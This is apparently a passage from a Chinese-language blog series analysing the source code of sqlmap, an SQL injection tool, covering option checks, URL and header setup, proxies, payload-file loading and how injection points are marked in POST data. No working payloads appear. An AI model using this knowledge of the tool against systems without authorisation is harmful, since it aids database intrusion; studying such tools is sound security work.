schemePort = re.search("\d\d[\:|\.]\d\d[\:|\.]\d\d\s+(http[\w]*)\:\/\/.*?\:([\d]+)", request, re.I)
if schemePort:
scheme = schemePort.group(1)
port = schemePort.group(2)
跳过一些无用的行,re.search如果搜索不到就会返回None
if not re.search ("^[\n]*(GET|POST).*?\sHTTP\/", request, re.I):
continue
if re.search("^[\n]*(GET|POST).*?\.(gif|jpg|png)\sHTTP\/", request, re.I):
continue
根据请求方式的不同,用多重方式获取
if len(line) == 0 or line == "\n":
if method == HTTPMETHOD.POST and data is None:
data = ""
params = True
elif (line.startswith("GET ") or line.startswith("POST ")) and " HTTP/" in line:
if line.startswith("GET "):
index = 4
else:
index = 5
url = line[index:line.index(" HTTP/")]
method = line[:index-1]
if "?" in line and "=" in line:
params = True
getPostReq = True
# POST parameters
elif data is not None and params:
data += line
# GET parameters
elif "?" in line and "=" in line and ": " not in line:
params = True
然后处理请求头
# Headers
elif ": " in line:
key, value = line.split(": ", 1)
# Cookie and Host headers
if key.lower() == "cookie":
cookie = value
elif key.lower() == "host":
if '://' in value:
scheme, value = value.split('://')[:2]
splitValue = value.split(":")
host = splitValue[0]
if len(splitValue) > 1:
port = filterStringValue(splitValue[1], '[0-9]')
if not scheme and port == "443":
scheme = "https"
# Avoid to add a static content length header to
# conf.httpHeaders and consider the following lines as
# POSTed data
if key == "Content-Length":
params = True
# Avoid proxy and connection type related headers
elif key not in ( "Proxy-Connection", "Connection" ):
conf.httpHeaders.append((str(key), str(value)))
一些基本的参数错误处理
__basicOptionValidation()
if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):
errMsg = "value for --start (limitStart) option must be an integer value greater than zero (>0)"
raise sqlmapSyntaxException, errMsg
if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):
errMsg = "value for --stop (limitStop) option must be an integer value greater than zero (>0)"
raise sqlmapSyntaxException, errMsg
if conf.limitStart is not None and isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
conf.limitStop is not None and isinstance(conf.limitStop, int) and conf.limitStop <= conf.limitStart:
errMsg = "value for --start (limitStart) option must be smaller than value for --stop (limitStop) option"
raise sqlmapSyntaxException, errMsg
if conf.firstChar is not None and isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
conf.lastChar is not None and isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
errMsg = "value for --first (firstChar) option must be smaller than or equal to value for --last (lastChar) option"
raise sqlmapSyntaxException, errMsg
if conf.cpuThrottle is not None and isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
errMsg = "value for --cpu-throttle (cpuThrottle) option must be in range [0,100]"
raise sqlmapSyntaxException, errMsg
if conf.textOnly and conf.nullConnection:
errMsg = "switch --text-only is incompatible with switch --null-connection"
raise sqlmapSyntaxException, errMsg
if conf.data and conf.nullConnection:
errMsg = "switch --data is incompatible with switch --null-connection"
raise sqlmapSyntaxException, errMsg
if conf.predictOutput and conf.threads > 1:
errMsg = "switch --predict-output is incompatible with switch --threads"
raise sqlmapSyntaxException, errMsg
if conf.threads > MAX_NUMBER_OF_THREADS:
errMsg = "maximum number of used threads is %d avoiding possible connection issues" % MAX_NUMBER_OF_THREADS
raise sqlmapSyntaxException, errMsg
if conf.forms and not conf.url:
errMsg = "switch --forms requires usage of -u (--url) switch"
raise sqlmapSyntaxException, errMsg
if conf.proxy and conf.ignoreProxy:
errMsg = "switch --proxy is incompatible with switch --ignore-proxy"
raise sqlmapSyntaxException, errMsg
if conf.forms and (conf.list or conf.direct or conf.requestFile or conf.googleDork):
errMsg = "switch --forms is compatible only with -u (--url) target switch"
raise sqlmapSyntaxException, errMsg
if conf.timeSec < 1:
errMsg = "value for --time-sec option must be an integer greater than 0"
raise sqlmapSyntaxException, errMsg
if isinstance(conf.uCols, basestring) and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2):
errMsg = "value for --union-cols must be a range with hyphon (e.g. 1-10)"
raise sqlmapSyntaxException, errMsg
一些格式错误,内容错误都包含进去了
加载tamper的自定义函数
__setTamperingFunctions()
看了看,没什么特别的,就是简单的加载并做了一些错误处理
解析目标url&设置一些配置
parseTargetUrl()
首先对传入的目标url解析,分别把目标、端口、路径、域名都解析出来
if not conf.url:
return
if not re.search("^http[s]*://", conf.url):
if ":443/" in conf.url:
conf.url = "https://" + conf.url
else:
conf.url = "http://" + conf.url
if URI_INJECTION_MARK_CHAR in conf.url:
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
__urlSplit = urlparse.urlsplit(conf.url)
__hostnamePort = __urlSplit[1].split(":")
conf.scheme = __urlSplit[0].strip()
conf.path = __urlSplit[2].strip()
conf.hostname = __hostnamePort[0].strip()
对于不自带端口的url,专门分析并设置端口号
if len(__hostnamePort) == 2:
try:
conf.port = int(__hostnamePort[1])
except:
errMsg = "invalid target url"
raise sqlmapSyntaxException, errMsg
elif conf.scheme == "https":
conf.port = 443
else:
conf.port = 80
连接成conf.url
conf.url = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, conf.path)
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
解析目标数据库
这里解析目标数据库并设置了一些配置parseTargetDirect()
这里处理的是直连数据库的解析函数,也就是前面提到的-d
if not conf.direct:
return
配置相应的参数
for dbms in SUPPORTED_DBMS:
details = re.search("^(?P<dbms>%s)://(?P<credentials>(?P<user>.+?)\:(?P<pass>.*?)\@)?(?P<remote>(?P<hostname>.+?)\:(?P<port>[\d]+)\/)?(?P<db>[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I)
if details:
conf.dbms = details.group('dbms')
if details.group('credentials'):
conf.dbmsUser = details.group('user')
conf.dbmsPass = details.group('pass')
else:
conf.dbmsUser = unicode()
conf.dbmsPass = unicode()
if not conf.dbmsPass:
conf.dbmsPass = None
if details.group('remote'):
remote = True
conf.hostname = details.group('hostname')
conf.port = int(details.group('port'))
else:
conf.hostname = "localhost"
conf.port = 0
conf.dbmsDb = details.group('db')
conf.parameters[None] = "direct connection"
break
处理并加载相应的模块
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
import _mssql
import pymssql
if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2":
errMsg = "pymssql library on your system must be "
errMsg += "version 1.0.2 to work, get it from "
errMsg += "http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/"
raise sqlmapMissingDependence, errMsg
elif dbmsName == DBMS.MYSQL:
import MySQLdb
elif dbmsName == DBMS.PGSQL:
import psycopg2
elif dbmsName == DBMS.ORACLE:
import cx_Oracle
elif dbmsName == DBMS.SQLITE:
import sqlite3
elif dbmsName == DBMS.ACCESS:
import pyodbc
elif dbmsName == DBMS.FIREBIRD:
import kinterbasdb
开始一些注入有关的配置
设置延时
_setHTTPTimeout()
除了默认设置30.0以外还判断不能小于3.0
if conf.timeout:
debugMsg = "setting the HTTP timeout"
logger.debug(debugMsg)
conf.timeout = float(conf.timeout)
if conf.timeout < 3.0:
warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
warnMsg += "will going to reset it"
logger.warn(warnMsg)
conf.timeout = 3.0
else:
conf.timeout = 30.0
socket.setdefaulttimeout(conf.timeout)
设置请求头header
_setHTTPExtraHeaders()
如果设置了头,那么就把header中的内容以列表的形式分割并赋值给conf.httpHeaders,
如果没设置,那就默认头输入到conf.httpHeaders
if conf.headers:
debugMsg = "setting extra HTTP headers"
logger.debug(debugMsg)
conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
for headerValue in conf.headers:
if not headerValue.strip():
continue
if headerValue.count(':') >= 1:
header, value = (_.lstrip() for _ in headerValue.split(":", 1))
if header and value:
conf.httpHeaders.append((header, value))
else:
errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u')
raise SqlmapSyntaxException(errMsg)
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5"))
if not conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
else:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
# Invalidating any caching mechanism in between
# Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store"))
conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache"))
设置cookie
_setHTTPCookies()
把cookie加入到conf.httpHeaders列表中
if conf.cookie:
debugMsg = "setting the HTTP Cookie header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie))
设置referer
和cookie相同,这里是吧referer加入到conf.httpHeaders列表中
if conf.referer:
debugMsg = "setting the HTTP Referer header"
logger.debug(debugMsg)
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
还有后面的一系列,也都是设置关于请求头的host和ua
_setHTTPHost()
_setHTTPUserAgent()
设置http用户验证
_setHTTPAuthentication()
检查http用户验证,判断属于(Basic, Digest, NTLM or PKI)中的哪一种方法,其中前三种需要用户密码,后一种需要私钥文件
涉及的东西比较多,就不贴代码了
设置http代理
_setHTTPHandlers()
简单看一下就是简单的判断,然后使用http/socks的代理。
基本的代理列表处理
if conf.proxyList is not None:
if not conf.proxyList:
errMsg = "list of usable proxies is exhausted"
raise SqlmapNoneDataException(errMsg)
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:]
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
elif not conf.proxy:
if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
proxyHandler.proxies = {}
简单的配置并设置代理…
设置DNS缓存
使用socket._getaddrinfo来设置请求的dns缓存
def _getaddrinfo(*args, **kwargs):
if args in kb.cache:
return kb.cache[args]
else:
kb.cache[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache[args]
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
socket.getaddrinfo = _getaddrinfo
设置socket链接
_setSocketPreConnect()
设置socket链接
简单的配置已经开始socket连接
if not hasattr(socket.socket, "_connect"):
socket._ready = {}
socket.socket._connect = socket.socket.connect
socket.socket.connect = connect
thread = threading.Thread(target=_)
setDaemon(thread)
thread.start()
设置安全连接
_setSafeVisit()
简单的解包,然后设置安全连接
raw = readCachedFileContent(conf.safeReqFile)
match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
设置安全链接
if match:
kb.safeReq.method = match.group(1)
kb.safeReq.url = match.group(2)
kb.safeReq.headers = {}
for line in raw[raw.find('\n') + 1:].split('\n'):
line = line.strip()
if line and ':' in line:
key, value = line.split(':', 1)
value = value.strip()
kb.safeReq.headers[key] = value
if key == HTTP_HEADER.HOST:
if not value.startswith("http"):
scheme = "http"
if value.endswith(":443"):
scheme = "https"
value = "%s://%s" % (scheme, value)
kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
else:
break
post = None
if '\r\n\r\n' in raw:
post = raw[raw.find('\r\n\r\n') + 4:]
elif '\n\n' in raw:
post = raw[raw.find('\n\n') + 2:]
if post and post.strip():
kb.safeReq.post = post
else:
kb.safeReq.post = None
一些乱七八糟的东西
_doSearch()
_setBulkMultipleTargets()
_setSitemapTargets()
_setCrawler()
_findPageForms()
根据参数的一些设置,还有tor connection的判断并设置_checkTor()
没有深究的必要,接着看后面的
关于设置数据库的check
_setDBMS()
简单的处理以及判定
conf.dbms = conf.dbms.lower()
regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
if regex:
conf.dbms = regex.group(1)
Backend.setVersion(regex.group(2))
if conf.dbms not in SUPPORTED_DBMS:
errMsg = "you provided an unsupported back-end database management "
errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
errMsg += "If you do not know the back-end DBMS, do not provide "
errMsg += "it and sqlmap will fingerprint it for you."
raise SqlmapUnsupportedDBMSException(errMsg)
for dbms, aliases in DBMS_ALIASES:
if conf.dbms in aliases:
conf.dbms = dbms
break
关于设置注入类型的check
和前面的数据库类型check相同,用户的设置在这里经过判断
_setTechnique()
同样是简单的处理以及判定
validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])
validLetters = [_[0][0].upper() for _ in validTechniques]
if conf.tech and isinstance(conf.tech, basestring):
_ = []
for letter in conf.tech.upper():
if letter not in validLetters:
errMsg = "value for --technique must be a string composed "
errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters)
errMsg += "user's manual for details"
raise SqlmapSyntaxException(errMsg)
for validTech, validInt in validTechniques:
if letter == validTech[0]:
_.append(validInt)
break
conf.tech = _
设置线程数
if not isinstance(conf.threads, int) or conf.threads <= 0:
conf.threads = 1
检查后端数据库系统
_setOS()
简单的处理和判定
if not conf.os:
return
if conf.os.lower() not in SUPPORTED_OS:
errMsg = "you provided an unsupported back-end DBMS operating "
errMsg += "system. The supported DBMS operating systems for OS "
errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS])
errMsg += "If you do not know the back-end DBMS underlying OS, "
errMsg += "do not provide it and sqlmap will fingerprint it for "
errMsg += "you."
raise SqlmapUnsupportedDBMSException(errMsg)
debugMsg = "forcing back-end DBMS operating system to user defined "
debugMsg += "value '%s'" % conf.os
logger.debug(debugMsg)
Backend.setOs(conf.os)
检查写文件目录
_setWriteFile()
没什么特别的,就是基本的判定
if not os.path.exists(conf.wFile):
errMsg = "the provided local file '%s' does not exist" % conf.wFile
raise SqlmapFilePathException(errMsg)
if not conf.dFile:
errMsg = "you did not provide the back-end DBMS absolute path "
errMsg += "where you want to write the local file '%s'" % conf.wFile
raise SqlmapMissingMandatoryOptionException(errMsg)
conf.wFileType = getFileType(conf.wFile)
检查Metasploit的设置
本地Metasploit的一些配置,就不贴代码了
检查设置的数据库身份验证语句
没什么可说的
if not conf.dbmsCred:
return
debugMsg = "setting the DBMS authentication credentials"
logger.debug(debugMsg)
match = re.search("^(.+?):(.*?)$", conf.dbmsCred)
if not match:
errMsg = "DBMS authentication credentials value must be in format "
errMsg += "username:password"
raise SqlmapSyntaxException(errMsg)
conf.dbmsUsername = match.group(1)
conf.dbmsPassword = match.group(2)
加载测试语句
加载测试语句并解析,这里的paths.BOUNDARIES_XML为E:\sqlmap\xml\boundaries.xml
def loadBoundaries():
try:
doc = et.parse(paths.BOUNDARIES_XML)
except Exception, ex:
errMsg = "something appears to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)
加载payload格式
然后是加载payload格式
def loadPayloads():
for payloadFile in PAYLOAD_XML_FILES:
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
try:
doc = et.parse(payloadFilePath)
except Exception, ex:
errMsg = "something appears to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)
其中payloadFilePath为:
E:\sqlmap\xml\payloads\boolean_blind.xml
E:\sqlmap\xml\payloads\error_based.xml
E:\sqlmap\xml\payloads\inline_query.xml
E:\sqlmap\xml\payloads\stacked_queries.xml
E:\sqlmap\xml\payloads\time_blind.xml
E:\sqlmap\xml\payloads\union_query.xml
更新版本
如果检测到–update,那么进入update模式update()
挺有趣的,可以看看
success = False
if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')"
logger.error(errMsg)
else:
infoMsg = "updating sqlmap to the latest development version from the "
infoMsg += "GitHub repository"
logger.info(infoMsg)
debugMsg = "sqlmap will try to update itself using 'git' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
try:
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
pollProcess(process, True)
stdout, stderr = process.communicate()
success = not process.returncode
except (IOError, OSError), ex:
success = False
stderr = getSafeExString(ex)
if success:
import lib.core.settings
_ = lib.core.settings.REVISION = getRevisionNumber()
logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _))
else:
if "Not a git repository" in stderr:
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')"
logger.error(errMsg)
else:
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
if not success:
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a GitHub for Windows client for updating "
infoMsg += "purposes (http://windows.github.com/) or just "
infoMsg += "download the latest snapshot from "
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
else:
infoMsg = "for Linux platform it's required "
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
logger.info(infoMsg)
加载常用的查询语句
最后也是初始化的核心,加载查询语句,针对不同数据的基础数据查询
def _loadQueries():
"""
Loads queries from 'xml/queries.xml' file.
"""
def iterate(node, retVal=None):
class DictObject(object):
def __init__(self):
self.__dict__ = {}
def __contains__(self, name):
return name in self.__dict__
if retVal is None:
retVal = DictObject()
for child in node.findall("*"):
instance = DictObject()
retVal.__dict__[child.tag] = instance
if child.attrib:
instance.__dict__.update(child.attrib)
else:
iterate(child, instance)
return retVal
tree = ElementTree()
try:
tree.parse(paths.QUERIES_XML)
except Exception, ex:
errMsg = "something appears to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
for node in tree.findall("*"):
queries[node.attrib['value']] = iterate(node)
xml/queries.xml就是各个语句的字典
开始
基本初始化完成后,就正式进入了注入测试中start()
sqlmap 源码分析(三)在注入之前
开始
在初始化完成后,就进入了正式的测试环节start()
直连数据库方式
初始化目标环境
没什么特殊的,有一部分是设置了urlencode过的post参数
if conf.data:
class _(unicode):
pass
kb.postUrlEncode = True
for key, value in conf.httpHeaders:
if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():
kb.postUrlEncode = "urlencoded" in value
break
if kb.postUrlEncode:
original = conf.data
conf.data = _(urldecode(conf.data))
setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
kb.postSpaceToPlus = '+' in original
创建输出的储存文件
def setupTargetEnv():
_createTargetDirs()
_setRequestParams()
_setHashDB()
_resumeHashDBValues()
_setResultsFile()
_setAuthCred()
创建文件
_createTargetDirs()
检查并创建文件作为输出目录,如果出现系统错误,爆出相应的警告
try:
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
_ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
open(_, "w+b").close()
os.remove(_)
if conf.outputDir:
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
logger.warn(warnMsg)
except (OSError, IOError), ex:
try:
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
except Exception, _:
errMsg = "unable to write to the temporary directory ('%s'). " % _
errMsg += "Please make sure that your disk is not full and "
errMsg += "that you have sufficient write permissions to "
errMsg += "create temporary files and/or directories"
raise SqlmapSystemException(errMsg)
写入基本信息
try:
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
if conf.data:
f.write("\n\n%s" % getUnicode(conf.data))
except IOError, ex:
if "denied" in getUnicode(ex):
errMsg = "you don't have enough permissions "
else:
errMsg = "something went wrong while trying "
errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex))
raise SqlmapMissingPrivileges(errMsg)
创建dump文件夹
def _createDumpDir():
"""
Create the dump directory.
"""
if not conf.dumpTable and not conf.dumpAll and not conf.search:
return
conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname
if not os.path.isdir(conf.dumpPath):
try:
os.makedirs(conf.dumpPath, 0755)
except OSError, ex:
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
warnMsg = "unable to create dump directory "
warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
warnMsg += "Using temporary directory '%s' instead" % tempDir
logger.warn(warnMsg)
conf.dumpPath = tempDir
创建文件文件夹
def _createFilesDir():
"""
Create the file directory.
"""
if not conf.rFile:
return
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
if not os.path.isdir(conf.filePath):
try:
os.makedirs(conf.filePath, 0755)
except OSError, ex:
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
warnMsg = "unable to create files directory "
warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
warnMsg += "Using temporary directory '%s' instead" % tempDir
logger.warn(warnMsg)
conf.filePath = tempDir
检查post data中的参数
_setRequestParams()
检查参数
这里检查post中的所有参数
执行对参数的检查,其中parameters就是get的参数,conf.data则是post的参数
# Perform checks on GET parameters
if conf.parameters.get(PLACE.GET):
parameters = conf.parameters[PLACE.GET]
paramDict = paramToDict(PLACE.GET, parameters)
if paramDict:
conf.paramDict[PLACE.GET] = paramDict
testableParameters = True
# Perform checks on POST parameters
if conf.method == HTTPMETHOD.POST and conf.data is None:
logger.warn("detected empty POST body")
conf.data = ""
判断是不是存在注入标志位
在sqlmap中*号是为手动标志的注入位置,这里的CUSTOM_INJECTION_MARK_CHAR就是星号
def process(match, repl):
retVal = match.group(0)
if not (conf.testParameter and match.group("name") not in conf.testParameter):
retVal = repl
while True:
_ = re.search(r"\\g<([^>]+)>", retVal)
if _:
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
else:
break
if CUSTOM_INJECTION_MARK_CHAR in retVal:
hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
return retVal
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
message += "'--data'. Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
else:
kb.processUserMarks = not test or test[0] not in ("n", "N")
if kb.processUserMarks:
kb.testOnlyCustom = True
JSON数据处理
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
_ = match.group(2)
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
kb.postHint = POST_HINT.JSON
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
message = "JSON-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.JSON_LIKE
数组数据处理
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
message = "Array-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
kb.postHint = POST_HINT.ARRAY_LIKE
SOAP/XML数据处理
elif re.search(XML_RECOGNITION_REGEX, conf.data):
message = "SOAP/XML data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
Multipart-like数据处理
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
message = "Multipart-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.MULTIPART
后面还有各种处理,包括cookie,请求头的处理
# Perform checks on Cookie parameters
if conf.cookie:
conf.parameters[PLACE.COOKIE] = conf.cookie
paramDict = paramToDict(PLACE.COOKIE, conf.cookie)
if paramDict:
conf.paramDict[PLACE.COOKIE] = paramDict
testableParameters = True
# Perform checks on header values
if conf.httpHeaders:
for httpHeader, headerValue in list(conf.httpHeaders):
# Url encoding of the header values should be avoided
# Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
if httpHeader.title() == HTTP_HEADER.USER_AGENT:
conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True)))
if condition:
conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
testableParameters = True
elif httpHeader.title() == HTTP_HEADER.REFERER:
conf.parameters[PLACE.REFERER] = urldecode(headerValue)
condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True)))
if condition:
conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
testableParameters = True
elif httpHeader.title() == HTTP_HEADER.HOST:
conf.parameters[PLACE.HOST] = urldecode(headerValue)
condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True)))
if condition:
conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue}
testableParameters = True
else:
condition = intersect(conf.testParameter, [httpHeader], True)
if condition:
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)}
conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders]
testableParameters = True
还有很多错误处理,就没必要贴了
crsf token的处理
if conf.csrfToken:
